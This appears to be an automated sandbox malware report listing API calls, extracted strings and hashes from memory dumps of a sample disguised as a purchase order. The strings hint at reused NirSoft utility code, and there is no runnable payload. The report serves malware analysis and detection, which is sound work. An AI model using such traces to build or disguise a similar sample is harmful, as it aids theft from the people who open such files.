                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                      • String ID: 4$h
                                                                                                      • API String ID: 4066021378-1856150674
                                                                                                      • Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                                      • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                      • Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                                      • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$_snwprintf
                                                                                                      • String ID: %%0.%df
                                                                                                      • API String ID: 3473751417-763548558
                                                                                                      • Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                                      • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                      • Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                                      • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                      APIs
                                                                                                      • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                      • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                      • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                      • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                      • GetParent.USER32(?), ref: 00406136
                                                                                                      • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                      • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                      • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                      • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                      • String ID: A
                                                                                                      • API String ID: 2892645895-3554254475
                                                                                                      • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                      • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                      • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                      • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                      APIs
                                                                                                      • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                        • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                        • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                        • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                        • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                      • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                      • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                      • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                      • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                      • memset.MSVCRT ref: 0040DA23
                                                                                                      • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                      • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                      • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                        • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                      • String ID: caption
                                                                                                      • API String ID: 973020956-4135340389
                                                                                                      • Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                                      • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                      • Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                                      • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                      • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                      • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                      • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$_snwprintf$wcscpy
                                                                                                      • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                      • API String ID: 1283228442-2366825230
                                                                                                      • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                                      • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                      • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                                      • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                      APIs
                                                                                                      • wcschr.MSVCRT ref: 00413972
                                                                                                      • wcscpy.MSVCRT ref: 00413982
                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                      • wcscpy.MSVCRT ref: 004139D1
                                                                                                      • wcscat.MSVCRT ref: 004139DC
                                                                                                      • memset.MSVCRT ref: 004139B8
                                                                                                        • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                        • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                      • memset.MSVCRT ref: 00413A00
                                                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                      • wcscat.MSVCRT ref: 00413A27
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                      • String ID: \systemroot
                                                                                                      • API String ID: 4173585201-1821301763
                                                                                                      • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                      • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                      • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                      • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: wcscpy
                                                                                                      • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                      • API String ID: 1284135714-318151290
                                                                                                      • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                      • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                      • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                      • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                      • String ID: 0$6
                                                                                                      • API String ID: 4066108131-3849865405
                                                                                                      • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                      • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                      • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                      • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004082EF
                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                      • memset.MSVCRT ref: 00408362
                                                                                                      • memset.MSVCRT ref: 00408377
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$ByteCharMultiWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 290601579-0
                                                                                                      • Opcode ID: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                                                                                      • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                      • Opcode Fuzzy Hash: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                                                                                      • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                      APIs
                                                                                                      • memchr.MSVCRT ref: 00444EBF
                                                                                                      • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                      • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                      • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                      • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                      • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                      • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                      • memset.MSVCRT ref: 0044505E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memchrmemset
                                                                                                      • String ID: PD$PD
                                                                                                      • API String ID: 1581201632-2312785699
                                                                                                      • Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                      • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                      • Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                      • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                      APIs
                                                                                                      • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                      • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                      • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                      • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                      • GetParent.USER32(?), ref: 00409FA5
                                                                                                      • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                      • String ID:
                                                                                                      • API String ID: 2163313125-0
                                                                                                      • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                      • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                      • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                      • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free$wcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 3592753638-3916222277
                                                                                                      • Opcode ID: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                                      • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                      • Opcode Fuzzy Hash: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                                      • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040A47B
                                                                                                      • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                      • wcslen.MSVCRT ref: 0040A4BA
                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                      • wcslen.MSVCRT ref: 0040A4E0
                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpywcslen$_snwprintfmemset
                                                                                                      • String ID: %s (%s)$YV@
                                                                                                      • API String ID: 3979103747-598926743
                                                                                                      • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                      • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                      • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                      • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                      APIs
                                                                                                      • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                      • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$AddressFreeLoadMessageProc
                                                                                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                      • API String ID: 2780580303-317687271
                                                                                                      • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                      • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                      • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                      • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                      APIs
                                                                                                      • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                                                                                      • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                                                                                      • wcslen.MSVCRT ref: 0040A6B1
                                                                                                      • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                      • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                                                                                      • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                      • String ID: Unknown Error$netmsg.dll
                                                                                                      • API String ID: 2767993716-572158859
                                                                                                      • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                      • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                      • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                      • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                      APIs
                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                      • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                      • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                      • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                        • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                      • API String ID: 3176057301-2039793938
                                                                                                      • Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                      • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                      • Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                      • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • out of memory, xrefs: 0042F865
                                                                                                      • database is already attached, xrefs: 0042F721
                                                                                                      • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                      • too many attached databases - max %d, xrefs: 0042F64D
